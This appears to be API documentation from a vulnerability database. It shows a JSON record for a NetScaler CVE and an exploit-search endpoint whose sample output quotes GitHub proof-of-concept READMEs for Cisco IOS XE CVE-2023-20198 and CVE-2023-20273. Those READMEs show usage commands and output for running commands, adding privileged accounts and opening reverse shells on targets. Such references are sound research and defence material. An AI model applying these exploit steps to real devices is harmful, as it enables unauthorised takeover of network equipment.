"title": "CVE-2023-6549",
"description": "Improper Restriction of Operations within the Bounds of a Memory Buffer in NetScaler ADC and NetScaler Gateway allows Unauthenticated Denial of Service \n",
"published": "2024-01-17T21:15:11",
"modified": "2024-01-24T20:48:33",
"epss": [
{
"cve": "CVE-2023-6549",
"epss": 0.00724,
"percentile": 0.80045,
"modified": "2024-02-11"
}
],
"cvss": {
"score": 5.0,
"vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"
},
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0
},
"severity": "MEDIUM",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
},
"cvss3": {
"cvssV3": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH"
}
},
"href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-6549",
"reporter": "[email protected]",
"references": [
"https://support.citrix.com/article/CTX584986/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20236548-and-cve20236549"
],
"cvelist": [
"CVE-2023-6549"
],
"immutableFields": [],
"lastseen": "2024-02-12T11:56:58",
"viewCount": 108,
"enchantments": {
"dependencies": {
"references": [
{
"type": "attackerkb",
"idList": [
"AKB:0EFA939C-ED7F-4BFE-B800-FF0C75E53214"
]
},
{
"type": "cisa_kev",
"idList": [
"CISA-KEV-CVE-2023-6549"
]
},
{
"type": "citrix",
"idList": [
"CTX584986"
]
},
{
"type": "hivepro",
"idList": [
"HIVEPRO:E7C0D983EAA9A4C2CE2DCCCCA4B407DD"
]
},
{
"type": "malwarebytes",
"idList": [
"MALWAREBYTES:6CCC816574632169A05704CE0E1928C8"
]
},
{
"type": "nessus",
"idList": [
"NETSCALER_ADC_GATEWAY_CTX584986.NASL"
]
},
{
"type": "prion",
"idList": [
"PRION:CVE-2023-6549"
]
},
{
"type": "thn",
"idList": [
"THN:55036E69D47D64800FB4CB6F8068DA4F"
]
}
]
},
"score": {
"value": 8.2,
"uncertanity": 0.1,
"vector": "NONE"
},
"reddit": {
"counter": 24,
"posts": [
{
"link": "https://www.reddit.com/r/CTI/comments/19a0a8c/cisa_adds_chrome_and_citrix_netscaler_to_its/",
"text": "CISAaddsChromeandCitrixNetScalertoitsKnownExploitedVulnerabilitiescatalog",
"author": "SirEliasRiddle",
"author_photo": "https://i.redd.it/snoovatar/avatars/nftv2_bmZ0X2VpcDE1NToxMzdfNDY2YTMzMDg4N2JkZjYyZDUzZjk2OGVhODI0NzkzMTUwZjA3NzYyZV8xMTkzMjQ5_rare_892c4323-6b60-487d-9278-5c0b90c591d4-headshot.png",
"date": "2024-01-18T23:43:43+00:00"
}
]
},
"exploitation": {
"wildExploitedSources": [
{
"type": "attackerkb",
"idList": [
"AKB:0EFA939C-ED7F-4BFE-B800-FF0C75E53214"
]
},
{
"type": "cisa_kev",
"idList": [
"CISA-KEV-CVE-2023-6549"
]
}
],
"wildExploited": true
},
"short_description": "CVE-2023-6549 Denial of Servic",
"tags": [
"cve-2023-6549",
"denial of service",
"nvd"
],
"vulnersScore": 8.2
},
"cna_cvss": {
"cna": "Citrix",
"cvss": {
"3": {
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"score": 8.2
}
}
},
"cpe": [],
"cpe23": [],
"cwe": [
"CWE-119",
"CWE-119"
],
"affectedSoftware": [
{
"cpeName": "citrix:netscaler_application_delivery_controller",
"version": "12.1-55.302",
"operator": "lt",
"name": "citrix netscaler application delivery controller"
},
{
"cpeName": "citrix:netscaler_application_delivery_controller",
"version": "13.0-92.21",
"operator": "lt",
"name": "citrix netscaler application delivery controller"
},
{
"cpeName": "citrix:netscaler_application_delivery_controller",
"version": "13.1-37.176",
"operator": "lt",
"name": "citrix netscaler application delivery controller"
},
{
"cpeName": "citrix:netscaler_application_delivery_controller",
"version": "13.1-51.15",
"operator": "lt",
"name": "citrix netscaler application delivery controller"
},
{
"cpeName": "citrix:netscaler_application_delivery_controller",
"version": "14.1-12.35",
"operator": "lt",
"name": "citrix netscaler application delivery controller"
},
{
"cpeName": "citrix:netscaler_gateway",
"version": "13.0-92.21",
"operator": "lt",
"name": "citrix netscaler gateway"
},
{
"cpeName": "citrix:netscaler_gateway",
"version": "13.1-51.15",
"operator": "lt",
"name": "citrix netscaler gateway"
},
{
"cpeName": "citrix:netscaler_gateway",
"version": "14.1-12.35",
"operator": "lt",
"name": "citrix netscaler gateway"
}
],
"affectedConfiguration": [],
"cpeConfiguration": {
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:12.1-55.302:*:*:*:fips:*:*:*",
"versionStartIncluding": "12.1",
"versionEndExcluding": "12.1-55.302",
"matchCriteriaId": "E5672003-8E6B-4316-B5C9-FE436080ADD1"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:12.1-55.302:*:*:*:ndcpp:*:*:*",
"versionStartIncluding": "12.1",
"versionEndExcluding": "12.1-55.302",
"matchCriteriaId": "D1A11ABD-4F45-4BA9-B30B-F1D8A612CC15"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:13.0-92.21:*:*:*:-:*:*:*",
"versionStartIncluding": "13.0",
"versionEndExcluding": "13.0-92.21",
"matchCriteriaId": "FC0A5AAC-62DD-416A-A801-A7A95D5EF73C"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:13.1-37.176:*:*:*:fips:*:*:*",
"versionStartIncluding": "13.1",
"versionEndExcluding": "13.1-37.176",
"matchCriteriaId": "8C8A6B95-8338-4EE7-A6EC-7D84AEDC4AF3"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:13.1-51.15:*:*:*:-:*:*:*",
"versionStartIncluding": "13.1",
"versionEndExcluding": "13.1-51.15",
"matchCriteriaId": "3CF77D9D-FC89-493D-B97D-F9699D182F54"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:14.1-12.35:*:*:*:-:*:*:*",
"versionStartIncluding": "14.1",
"versionEndExcluding": "14.1-12.35",
"matchCriteriaId": "62CD82CF-9013-4E54-B175-19B804A351AA"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_gateway:13.0-92.21:*:*:*:*:*:*:*",
"versionStartIncluding": "13.0",
"versionEndExcluding": "13.0-92.21",
"matchCriteriaId": "68E1F810-ABCD-40A7-A8C1-4E8727799C7C"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_gateway:13.1-51.15:*:*:*:*:*:*:*",
"versionStartIncluding": "13.1",
"versionEndExcluding": "13.1-51.15",
"matchCriteriaId": "E870C309-D5CD-4181-9DEB-4833DE2EAEB7"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_gateway:14.1-12.35:*:*:*:*:*:*:*",
"versionStartIncluding": "14.1",
"versionEndExcluding": "14.1-12.35",
"matchCriteriaId": "2836707F-A36F-479E-BFDC-CF55AEFC37EE"
}
]
}
]
},
"extraReferences": [
{
"url": "https://support.citrix.com/article/CTX584986/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20236548-and-cve20236549",
"source": "[email protected]",
"tags": [
"Vendor Advisory"
]
}
],
"product_info": [
{
"vendor": "Cloud Software Group",
"product": "NetScaler ADC"
}
],
"solutions": [],
"workarounds": [],
"impacts": [],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-119",
"description": "CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer",
"lang": "en",
"type": "CWE"
}
]
}
],
"exploits": [],
"assigned": "2023-12-06T11:01:58"
}
}
Public available exploits¶
Specify a vulnerability or software identifier to obtain publicly available exploits from the Vulners database using this method.
Required parameters:
- query (str): Search query by Lucene syntax
- skip (int):
- size (int): Count of output elements
- apiKey: Activated API key
Query:
POST /api/v3/search/lucene/
Query example for software identifier:
curl -XPOST https://vulners.com/api/v3/search/lucene/ -H 'Content-Type: application/json' -d '{
"query": "cisco ios xe",
"skip": 0,
"size": 100,
"fields": [
"id",
"title",
"description",
"type",
"bulletinFamily",
"cvss",
"published",
"modified",
"lastseen",
"href",
"sourceHref",
"sourceData",
"cvelist",
"sourceData"],
"apiKey": "{API key}"
}'
Query example for CVE (vulnerability):
curl -XPOST https://vulners.com/api/v3/search/lucene/ -H 'Content-Type: application/json' -d '{
"query": "CVE-2023-20198",
"skip": 0,
"size": 100,
"fields": [
"id",
"title",
"description", "type",
"bulletinFamily",
"cvss",
"published",
"modified",
"lastseen",
"href",
"sourceHref",
"sourceData",
"cvelist",
"sourceData"],
"apiKey": "{API key}"
}'
Example with search method:
curl -XPOST https://vulners.com/api/v3/search/lucene/ -H 'Content-Type: application/json' -d '{
"query": "bulletinFamily:exploit AND cisco ios xe",
"skip": 0,
"size": 10,
"fields": [
"id",
"title",
"description",
"type",
"bulletinFamily",
"cvss",
"published",
"modified",
"lastseen",
"href",
"sourceHref",
"sourceData",
"cvelist"],
"apiKey": "{API key}"
}'
cisco_exploits = vulners_api.find_exploit_all("cisco ios xe")
cve_exploits = vulners_api.find_exploit_all("CVE-2023-20198", limit=5)
search_exploits = vulners_api.find_all("bulletinFamily:exploit AND cisco ios xe", limit=5)
Query output for software identifier:
[
{
"lastseen": "2024-09-12T13:39:16",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198",
"CVE-2023-20273"
],
"description": "# CVE-2023-20198\nExploit PoC for CVE-2023-20198\n\n## Description\nCVE-2023-20198 is characterized by improper path validation to bypass Nginx filtering to reach the `webui_wsma_http` web endpoint without requiring authentication.<br>\nBy bypassing authentication to the endpoint, an attacker can execute arbitrary Cisco IOS commands or issue configuration changes with Privilege 15 privileges.<br>\nCisco's investigation into active exploitation of the previously undisclosed vulnerability revealed threat actors first exploited CVE-2023-20198 to add a new user with Privilege level 15. Further attacks involved exploitation of CVE-2023-20273 to escalate to the underlying Linux OS `root` user to facilitate implantation.<br> \n\nThis PoC exploits CVE-2023-20198 to leverage two different XML SOAP endpoints:<br>\nThe vulnerability check, config, and command execution options all target the `cisco:wsma-exec` SOAP endpoint to insert commands into the `execCLI` element tag.<br>\nThe add user option targets the `cisco:wsma-config` SOAP endpoint to issue a configuration change and add the Privilege 15 account. This endpoint could be [ab]used to make other configuration changes, but thats outside the scope of this PoC.<br>\n\nAbuse of the `cisco:wsma-exec` SOAP endpoint came from the nuclei template<br>\nAbuse of the `cisco:wsma-config` SOAP endpoint came from the horizon3ai PoC<br>\n\nNote: I did not conduct any of the original research or PoC development for this CVE. See the references section for credit.\n\n## Usage\n```\nusage: exploit.py [-h] (-t targetIP | -l targetFile) [-https] (-c | -g | -e command | -a | -d) [-u newUserName] [-p newUserPass] [-o outputFile] [-v]\n\nCVE-2023-20198 Exploit PoC\n\noptions:\n -h, --help show this help message and exit\n -t targetIP Target IP Address\n -l targetFile File containing IP Addresses (-c only)\n -https Use https\n -c [X] Check for vulnerability\n -g [X] Get Cisco IOS running config\n -e command [X] Execute Cisco IOS command\n -a [X] Add new priv 15 user\n -d [X] Remove priv 15 user\n -u newUserName [Optional] user name for -a or -d. Default: shellsmoke\n -p newUserPass [Optional] new user pass for -a. Default: pwned\n -o outputFile Write output to file\n -v Increase verbosity\n```\n\n### Vulnerability check\nTo check for CVE-2023-20198, `-c` will attempt to exploit the vulnerability to execute `uname -a`<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -c\n\nTesting for vulnerability\nTarget IP: 10.0.0.1\nTarget URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\nVulnerable: True\nIOS Ver: <REDACTED> IOS 16.6 Cisco IOS Software [Everest], Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version 16.6.5, RELEASE SOFTWARE (fc3)\n```\n\n### Get Cisco Config\nThe `-g` option executes `sh run` to pull the running config<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -g\n\nBuilding configuration...\nCurrent configuration : 6988 bytes\n!\n...\n!\nversion 16.6\nno service pad\nservice timestamps debug datetime msec\nservice timestamps log datetime msec\n...\n```\n\n### Execute commands\nArbitrary Cisco IOS commands can be executed with the `-e` option.<br>\nExtreme caution should be used when using this to make configuration changes. There is no input validation and changes are applied immediately to the running config.<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -e 'sh log'\n\nSelected Target: 10.0.0.1\nRunning in Exec Mode\nExecuting Command: sh log\n\nSending exploit to target URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\n\nSyslog logging: enabled (0 messages dropped, 1 messages rate-limited, 0 flushes, 0 overruns, xml disabled, filtering disabled)\nNo Active Message Discriminator.\nNo Inactive Message Discriminator.\n Console logging: level debugging, 5368 messages logged, xml disabled,\n filtering disabled\n...\n```\n\n### Add user\nThe `-a` option can be used to create a new Privilege 15 user account, optionally specifying the account name and password with `-u` and `-p` respectively.<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -a -u shellsmoke -p pwned\n\nSelected Target: 10.0.0.1\nAdding New Privilege 15 User\nNew User Name: shellsmoke\nNew User Pass: pwned\n\nSending exploit to target URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\n\nNo reportable output from adding users\nCheck verbose ouput or get running config\nDone.\n```\n\n### Del user\nThe `-d` option can be used to remove a user account from the device, and respects the username specified with `-u`.<br>\nCaution should be used to make sure you aren't deleting a legitimate account.<br>\nThis was added for instances where shell/webui access to an exploited Cisco can not be obtained. It was observed that adding a Privilege 15 user does not grant webui access and could lead to leaving exploitation artifacts on hosts.<br>\n\n## References\n[Cisco Advisory](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z)<br>\n[horizon3ai CVE-2023-20198 research](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/)<br>\n[horizon3ai CVE-2023-20198 PoC](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/)<br>\n[nuclei CVE-2023-20198 template](https://cloud.projectdiscovery.io/public/CVE-2023-20198) (Authors: iamnoooob, rootxharsh, pdresearch)<br>\n[LeakIX CVE-2023-20273 PoC](https://blog.leakix.net/2023/10/cisco-root-privesc/)<br>\n\n## TODO\n- [ ] https support\n- [ ] CVE-2023-20273 Implementation\n- [ ] Timeout and error handling\n\n## Disclaimer\nThe code contained in this project is intended only for research and usage on systems where the user has explicit authorization.<br>\nThe author of this project is not responsible or liable for misuse of the software.<br>\nUse responsibly and don't be evil\n\n",
"modified": "2024-09-12T06:33:33",
"id": "943D5962-14B3-5410-8106-BD5EEA778153",
"published": "2023-11-16T16:39:38",
"href": "https://github.com/smokeintheshell/CVE-2023-20198",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/943D5962-14B3-5410-8106-BD5EEA778153"
},
{
"lastseen": "2024-08-28T00:16:11",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20273",
"CVE-2023-20198"
],
"description": "# CVE-2023-20198\nExploit PoC for CVE-2023-20198\n\n## Description\nCVE-2023-20198 is characterized by improper path validation to bypass Nginx filtering to reach the `webui_wsma_http` web endpoint without requiring authentication.<br>\nBy bypassing authentication to the endpoint, an attacker can execute arbitrary Cisco IOS commands or issue configuration changes with Privilege 15 privileges.<br>\nCisco's investigation into active exploitation of the previously undisclosed vulnerability revealed threat actors first exploited CVE-2023-20198 to add a new user with Privilege level 15. Further attacks involved exploitation of CVE-2023-20273 to escalate to the underlying Linux OS `root` user to facilitate implantation.<br> \n\nThis PoC exploits CVE-2023-20198 to leverage two different XML SOAP endpoints:<br>\nThe vulnerability check, config, and command execution options all target the `cisco:wsma-exec` SOAP endpoint to insert commands into the `execCLI` element tag.<br>\nThe add user option targets the `cisco:wsma-config` SOAP endpoint to issue a configuration change and add the Privilege 15 account. This endpoint could be [ab]used to make other configuration changes, but thats outside the scope of this PoC.<br>\n\nAbuse of the `cisco:wsma-exec` SOAP endpoint came from the nuclei template<br>\nAbuse of the `cisco:wsma-config` SOAP endpoint came from the horizon3ai PoC<br>\n\nNote: I did not conduct any of the original research or PoC development for this CVE. See the references section for credit.\n\n## Usage\n```\nusage: exploit.py [-h] (-t targetIP | -l targetFile) [-https] (-c | -g | -e command | -a | -d) [-u newUserName] [-p newUserPass] [-o outputFile] [-v]\n\nCVE-2023-20198 Exploit PoC\n\noptions:\n -h, --help show this help message and exit\n -t targetIP Target IP Address\n -l targetFile File containing IP Addresses (-c only)\n -https Use https\n -c [X] Check for vulnerability\n -g [X] Get Cisco IOS running config\n -e command [X] Execute Cisco IOS command\n -a [X] Add new priv 15 user\n -d [X] Remove priv 15 user\n -u newUserName [Optional] user name for -a or -d. Default: shellsmoke\n -p newUserPass [Optional] new user pass for -a. Default: pwned\n -o outputFile Write output to file\n -v Increase verbosity\n```\n\n### Vulnerability check\nTo check for CVE-2023-20198, `-c` will attempt to exploit the vulnerability to execute `uname -a`<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -c\n\nTesting for vulnerability\nTarget IP: 10.0.0.1\nTarget URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\nVulnerable: True\nIOS Ver: <REDACTED> IOS 16.6 Cisco IOS Software [Everest], Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version 16.6.5, RELEASE SOFTWARE (fc3)\n```\n\n### Get Cisco Config\nThe `-g` option executes `sh run` to pull the running config<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -g\n\nBuilding configuration...\nCurrent configuration : 6988 bytes\n!\n...\n!\nversion 16.6\nno service pad\nservice timestamps debug datetime msec\nservice timestamps log datetime msec\n...\n```\n\n### Execute commands\nArbitrary Cisco IOS commands can be executed with the `-e` option.<br>\nExtreme caution should be used when using this to make configuration changes. There is no input validation and changes are applied immediately to the running config.<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -e 'sh log'\n\nSelected Target: 10.0.0.1\nRunning in Exec Mode\nExecuting Command: sh log\n\nSending exploit to target URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\n\nSyslog logging: enabled (0 messages dropped, 1 messages rate-limited, 0 flushes, 0 overruns, xml disabled, filtering disabled)\nNo Active Message Discriminator.\nNo Inactive Message Discriminator.\n Console logging: level debugging, 5368 messages logged, xml disabled,\n filtering disabled\n...\n```\n\n### Add user\nThe `-a` option can be used to create a new Privilege 15 user account, optionally specifying the account name and password with `-u` and `-p` respectively.<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -a -u shellsmoke -p pwned\n\nSelected Target: 10.0.0.1\nAdding New Privilege 15 User\nNew User Name: shellsmoke\nNew User Pass: pwned\n\nSending exploit to target URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\n\nNo reportable output from adding users\nCheck verbose ouput or get running config\nDone.\n```\n\n### Del user\nThe `-d` option can be used to remove a user account from the device, and respects the username specified with `-u`.<br>\nCaution should be used to make sure you aren't deleting a legitimate account.<br>\nThis was added for instances where shell/webui access to an exploited Cisco can not be obtained. It was observed that adding a Privilege 15 user does not grant webui access and could lead to leaving exploitation artifacts on hosts.<br>\n\n## References\n[Cisco Advisory](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z)<br>\n[horizon3ai CVE-2023-20198 research](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/)<br>\n[horizon3ai CVE-2023-20198 PoC](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/)<br>\n",
"modified": "2024-08-26T08:31:22",
"id": "1C5F3D5A-F5D6-5471-967F-FD50D6649359",
"published": "2024-08-26T08:16:28",
"href": "https://github.com/sanan2004/CVE-2023-20198",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/1C5F3D5A-F5D6-5471-967F-FD50D6649359"
},
{
"lastseen": "2024-08-29T17:42:53",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198"
],
"description": "# Cisco-IOS-EX-Scanner (CVE-2023-20198)\nCVE-2023-20198 & 0Day Implant Scanner (tested in a lab and works, YMMV)\n\nQuick and dirty scanner to run checks if the host is vulnerable/been compromised using 0day in Cisco IOS XE. This tool is designed to scan a given target or a list of targets to determine potential vulnerabilities based on specific checks.\n\n## Reqs\n```\npip install requests\n```\n## Usage\nYou can use the XE Implant Scanner in two modes: Single target mode and multiple targets mode (using an input file).\n\n### Single Target Mode:\n\n```\npython XEImplantScanner.py --rhost [TARGET_IP_OR_DOMAIN] [--rport PORT_NUMBER] [--ssl]\n```\n#### Arguments:\n\n- --rhost : The IP address or domain name of the target.\n- --rport : The port number to scan (default is 80).\n- --ssl : Use this flag to enable SSL.\n\n### Multiple Targets Mode (Using an Input File):\n\n```\npython XEImplantScanner.py --input_file [FILE_NAME] [--rport PORT_NUMBER] [--ssl]\n```\n\n#### Arguments:\n\n- --input_file : A file containing a list of IP addresses or domain names to scan, one per line.\n- --rport : The port number to scan (default is 80).\n- --ssl : Use this flag to enable SSL.\n",
"modified": "2024-08-22T13:08:12",
"id": "BD95D173-6A21-51A9-837D-51BCE64F5340",
"published": "2023-10-17T22:41:14",
"href": "https://github.com/ZephrFish/Cisco-IOS-XE-Scanner",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/BD95D173-6A21-51A9-837D-51BCE64F5340"
},
{
"lastseen": "2024-08-23T13:18:36",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198"
],
"description": "# Cisco-IOS-EX-Scanner (CVE-2023-20198)\nCVE-2023-20198 & 0Day Implant Scanner (tested in a lab and works, YMMV)\n\nQuick and dirty scanner to run checks if the host is vulnerable/been compromised using 0day in Cisco IOS XE. This tool is designed to scan a given target or a list of targets to determine potential vulnerabilities based on specific checks.\n\n## Reqs\n```\npip install requests\n```\n## Usage\nYou can use the XE Implant Scanner in two modes: Single target mode and multiple targets mode (using an input file).\n\n### Single Target Mode:\n\n```\npython XEImplantScanner.py --rhost [TARGET_IP_OR_DOMAIN] [--rport PORT_NUMBER] [--ssl]\n```\n#### Arguments:\n\n- --rhost : The IP address or domain name of the target.\n- --rport : The port number to scan (default is 80).\n- --ssl : Use this flag to enable SSL.\n\n### Multiple Targets Mode (Using an Input File):\n\n```\npython XEImplantScanner.py --input_file [FILE_NAME] [--rport PORT_NUMBER] [--ssl]\n```\n\n#### Arguments:\n\n- --input_file : A file containing a list of IP addresses or domain names to scan, one per line.\n- --rport : The port number to scan (default is 80).\n- --ssl : Use this flag to enable SSL.\n",
"modified": "2024-08-22T13:08:12",
"id": "5770078F-F5C7-5063-98C6-7C111F447FB3",
"published": "2023-10-17T22:41:14",
"href": "https://github.com/ZephrFish/CVE-2023-20198-Checker",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/5770078F-F5C7-5063-98C6-7C111F447FB3"
},
{
"lastseen": "2024-08-13T16:25:12",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20273"
],
"description": "# CVE-2023-20273\nCVE-2023-20273 Exploit PoC\n\n## Usage\n```\nusage: exploit.py [-h] -t URL -u Username -p Password (-c Command | -r) [-dest Outfile] [-www | -tcp | -null] [-ip LocalIP] [-port LocalPort] [-fs filesystem] [-path filepath] [-operation operation_type] [-v] [-q]\n\nCVE-2023-20273 Exploit PoC\n\noptions:\n -h, --help show this help message and exit\n\nTarget options:\n [Mandatory] Target arguments\n\n -t URL, --url URL Target Cisco URL (eg https://192.168.1.1 or http://192.168.2.2:8080)\n -u Username, --user Username Cisco webui user name\n -p Password, --pass Password Cisco webui user pass\n\nExploit mode:\n [Mandatory] Exec command or reverse shell\n\n -c Command Command to run\n -r Reverse shell (requires -ip and -port)\n\nOutput Options:\n [Optional] Command output options\n\n -dest Outfile [-r | -www | -tcp] destination file (default: random)\n -www [Default] Attempt to retrieve output via target web server\n -tcp [Not implemented] Attempt to send output to a TCP listener (requires -ip and -port)\n -null Do not attempt to get command output\n\nCallback Options:\n For reverse shell or command output\n\n -ip LocalIP Local IP for reverse shell/command output\n -port LocalPort Local port for reverse shell/command output\n\nExploit options:\n [Not implemented] Exploit modifiers\n\n -fs filesystem Filesystem on target for exploit staging (default: flash)\n -path filepath Filepath on target filesystem for exploit staging (default: shellsmoke)\n -operation operation_type Install operation type (not currently implemented) (default: SMU)\n\nVerbosity control:\n -v Verbose output\n -q Suppress Banner\n```\n",
"modified": "2024-08-12T20:33:05",
"id": "80EF6EF3-C7F8-5300-8CD6-0F3CC33A3011",
"published": "2023-12-09T07:25:43",
"href": "https://github.com/smokeintheshell/CVE-2023-20273",
"type": "githubexploit",
"title": "Exploit for OS Command Injection in Cisco Ios Xe",
"cvss": {
"score": 7.2,
"severity": "HIGH",
"vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/80EF6EF3-C7F8-5300-8CD6-0F3CC33A3011"
},
{
"lastseen": "2024-08-13T16:45:43",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198"
],
"description": "# CVE-2023-20198 - PoC SCRIPT /!\\\n\n> **Disclaimer:** This script is provided 'as is' and exclusively for educational purposes. Users are strongly advised to exercise caution and utilize it within the boundaries of legal and ethical considerations.\n\n## Description\nExecute various actions on a target web server, such as creating and/or deleting a local user account, restarting the web server, installing and checking for the presence of the implant, and concluding by cleaning up the created user account.\n\n## Requirements\n- Python 3.x\n- Requests library (`pip install requests`)\n\n## Usage\n```bash \npython CVE_CISCO_20198_V2.py\n```\n\n## About\n[![made-with-python](https://img.shields.io/badge/Made%20with-Python-blue.svg)](https://www.python.org/) \n[![Python 3.x](https://img.shields.io/badge/Python-3.x-blue.svg)](https://www.python.org/downloads/release/python-360/)\n[![License: GPL v3](https://img.shields.io/badge/License-GPLv3-blue.svg)](https://www.gnu.org/licenses/gpl-3.0)\n[![email-contact](https://img.shields.io/badge/[email protected])](mailto:[email protected]) \n",
"modified": "2024-08-12T20:32:54",
"id": "952BD0EC-74EB-5C7A-8E40-2AD40DB6C17A",
"published": "2023-10-20T23:34:12",
"href": "https://github.com/sohaibeb/CVE-2023-20198",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/952BD0EC-74EB-5C7A-8E40-2AD40DB6C17A"
},
{
"lastseen": "2024-08-31T22:48:49",
"description": "",
"published": "2024-08-31T00:00:00",
"type": "packetstorm",
"title": "Cisco IKE Information Disclosure",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2016-6415"
],
"modified": "2024-08-31T00:00:00",
"id": "PACKETSTORM:180932",
"href": "https://packetstormsecurity.com/files/180932/Cisco-IKE-Information-Disclosure.html",
"sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Auxiliary \ninclude Msf::Auxiliary::Scanner \ninclude Msf::Auxiliary::Report \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Cisco IKE Information Disclosure', \n'Description' => %q{ \nA vulnerability in Internet Key Exchange version 1 (IKEv1) packet \nprocessing code in Cisco IOS, Cisco IOS XE, and Cisco IOS XR Software \ncould allow an unauthenticated, remote attacker to retrieve memory \ncontents, which could lead to the disclosure of confidential information. \n \nThe vulnerability is due to insufficient condition checks in the part \nof the code that handles IKEv1 security negotiation requests. \nAn attacker could exploit this vulnerability by sending a crafted IKEv1 \npacket to an affected device configured to accept IKEv1 security \nnegotiation requests. A successful exploit could allow the attacker \nto retrieve memory contents, which could lead to the disclosure of \nconfidential information. \n}, \n'Author' => [ 